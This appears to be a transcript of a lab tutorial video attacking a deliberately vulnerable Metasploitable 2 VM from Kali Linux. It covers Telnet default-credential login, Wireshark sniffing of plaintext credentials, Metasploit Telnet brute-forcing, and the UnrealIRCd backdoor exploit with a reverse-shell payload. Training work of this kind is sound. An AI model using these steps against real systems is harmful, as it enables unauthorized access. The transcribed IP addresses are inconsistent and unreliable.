Yeah, that is the first method basically. Hello everyone, my name is Francesco and I'm joined today by my partner Jeff Matthew. And in this video, we're going to be showcasing how you can exploit a metasploitable machine via Telnet or via IRC. But before we begin, we want to make sure that you have both Metasploitable and Kali Linux installed on your VM manager, and you want to run them both on parallel. You want to also make sure that they are able to communicate with one another. To do so, you can first find out what their IP addresses are. This right here is the IP address of the Kali machine, and this should be hold on, the IP address of the Metasploitable machine. Now we want to ping them to one another to see whether they can communicate. So to ping the Kali machine from Metasploitable, just type in ping followed by the IP of the Kali machine. 68.4. And as you can see here, we've received a response from Kali. Now let's see if the same can be said over on this side. So let's type in ping followed by the IP of the Metasploitable machine. 168.10.5. So as you can see here, the Kali machine has received a response from the Metasploitable machine. From this, we can conclude that they are both able to communicate just fine with each other. Now we can start to scan for open ports that are available to try and exploit on the Metasploitable machine. So to do that, we can use mmap-sv followed by the IP address of the Metasploitable machine. Now, what this is doing is showing the services that we can try to exploit later on with the use of nmap. And what nmap is it sends packets to the ports in the Metasploitable machine and analyzes the response. And what -sv basically does is it shows the version of each services. Now we have a pretty long list here, but for this video, we're just going to be focused on working with Telnet and IRC. So let's start with Telnet real quick. So let's start with Telnet first. The network protocol allows the user to log into another computer within the same network through an IP connection. Telnet, however, has many flaws when it comes to security concerns. When it comes to exploiting Metasploitable through Telnet, there are three ways in how we can go about this, as far as I know. So the first way is to actually just use Telnet. So to use it, let's say we want to connect to, we want to log into our Metasploitable machine via Kali Linux. So to do that, um, just type in Telnet followed by the IP address of the Metasploitable machine. So here, as we can see, we're taken straight to the Metasploitable login page. And this is more of Metasploitable's flaw, more than it is Telnet's flaw. But we can find the login username and password right over here. So anyone, without the need to verify whether they are authorized or not, can just log into this Metasploitable machine via Telnet as long as they know the IP address of this machine. Oh, sorry about that. MSF admin. There you go. And even though we're just logged in as MSF admin here, we can still switch to root, which makes it even more dangerous because we know the password for this. And yeah, that is the first method basically. Another flaw that Telnet has is its vulnerability. Now, Telnet is also very vulnerable to cybersecurity attacks due to its lack of encryption methods. Telnet basically transfers data through plain text without the need to encrypt at all, which is why it is highly advised for users to use this on a local private network as opposed to using it on the internet. So let's say I am a hacker trying to. So let's have a scenario where I'm a hacker who has downloaded a network sniffing tool in the user's computer. When the user tries to telnet to another network or another one of their machines, I'll be able to see all the data that they are transferring as well as their credentials. So let's uh, see how that will work. First, you need to open Wireshark, and I'll provide a link down in the description below to for you to see how you can download Wireshark. Next, just click on ETH0. Okay, so while this is running, let's try to hold on. Let's try to connect to the metasploitable machine via Telnet. Just type in Telnet 196.168.10.5. Okay, and then type in the credentials. All right, so we successfully logged in here. So let's see what we can find in Wireshark. Now, Wireshark basically monitors all your networking data, all your traffic basically, or your networking traffic. And here we can find the telnet data that we executed just now. So next, what you want to do is to click on follow, or to right click on this, on telnet, click on follow and click on TCP stream, follow TCP stream. And as you can see here, the data being transferred was not encrypted and it's just written in plain text alongside the credentials that we used. So here MSF admin is written twice because it's both receiving and sending. But yeah, this is the username and this is the password. Okay, so now for the third method, let's assume that we are a hacker who has a list of all the possible credentials that is needed to log in into the metasploitable device. This list can just be a list of all the credentials this user has, and we can basically use brute force to find out which one matches, which one is used for the metasploitable machine via Telnet. So to do that, let's first create the list of passwords and usernames. So let's do that txt says John, MSF admin, and Jacob. Now let's say the possible passwords are John 123, MSF admin, and Jacob. So obviously we know that the MSF admin one is the correct one, but let's just assume that we do not. So next we need to open MSF console. Just wait for that. Okay, now that we've opened the MSF console, we can start by searching a module for login through Telnet. Let's say this. And here, yep, there is a module available for that. So let's use that one. And let's see what we can do with this module. So here, we're obviously not going to use anonymous login or blank passwords as it's clearly not blank. Before speed, we can keep at 5. So let's set our host first. So set our host. So this is the IP address of the, so we're setting the host of the machine, and that should be the IP address of the metasploitable device, metasploitable machine. So 96.168.10.5. Next, let's set the username file. As well as the password file. And finally, we should set stop underscore on success to be true. So what this does is basically once the program has found the correct credentials, it just totally stops. Otherwise, if you set this as false, it'll keep going until the list ends. Now that we've got this set up, let's run this, and you can do that by either typing run or exploit. I like to write exploit because it sounds cooler. Okay, there you go. So as you can see here, it iterates. First, it uses the username John and tries every password. Then it tries the username MSF admin, and as soon as it finds the correct credential, it stops, and you can see here that command shell session 1 has been opened. So if we just type session 1, sessions 1, we have now gained access into the metasploitable. So who am I? MSF admin, and let's check whether this is the correct machine by looking at the IP address, and it indeed is the correct IP address.
Okay, so hi everyone. Today I'm going to show you how to exploit a Linux system through the backdoor via the IRC. The target machine that I will be using is metasploitable 2. So first of all, you want to open your Kali Linux and your metasploitable using your own VirtualBox and make sure that they both are bridged in the same network. So first of all, let's just log in. So let's reset. So first of all, you want to open Metasploit framework here, and you want to insert your password for your Kali Linux. So once that's done, you want to type in search IRC to search for all available IRC modules. So here are all of the exploits available. So now for the backdoor exploit, we will use this one, Unix IRC Unreal IRCD. So first of all, we will type in use Unix slash IRC slash Unreal underscore IRCD underscore 3281 underscore backdoor. Then we press enter. Just wait. And now that we will show our target commands to see the target lists and also set the target using set commands show targets and also set our target to 0. Now we need to set the payload so that you are going to use the exploit to set the payload. So we need to use show payloads to view all of the available payloads for the exploits. So here are all of the available payloads for the exploit. So let's say we want to use the Unix reverse. So we just type in set payload cmd Unix reverse. And once that is set, we can use show options command to view all of the options for the exploit. Now, to continue, we need to first set our host, the remote host, and the local host using command set. Our remote host will be the Metasploitable 2, and the local host will be the Kali Linux system we are using. To check both of the respective IP addresses, we need to use the ifconfig. So first of all, let's do it first on our Metasploitable here. So as you can see, our IP address here is 192.168.109 here as shown. And let's do it the same for our Kali Linux as well. oops, ifconfig here as well. So here our IP address is 192.168.110. So first of all, we need to set the R host, the remote host, using the IP address of metasploitable 2. So in this case, 192.168.109. So to do that, we need to type set R host 192.168.100.9. And now the R host is 192.168.109. And we need to also set the local host using the IP address for Kali Linux. So to do that, we need to set lhost 192.168.100.10. Now that all of it is set up, let's set up the target system for the exploit, which is metasploitable2, using the command exploit. Now here, we are already in the target system, and as you can see, a new shell session 1 was opened in Kali Linux after using the command. This shows that we have already created a backdoor in metasploitable2, which is our target system. Now that we are in, we can do anything using the command ls to list the target directories of the target system. So here, let's just do ls system. We can also use ifconfig to see the IP address of our target system. So here, ifconfig says that the target address IP is 192.168.109, which correlates directly to metasploitable here, 192.168.109. So that's all for this video. Thank you for watching. I hope you guys learned something new, and have a great day.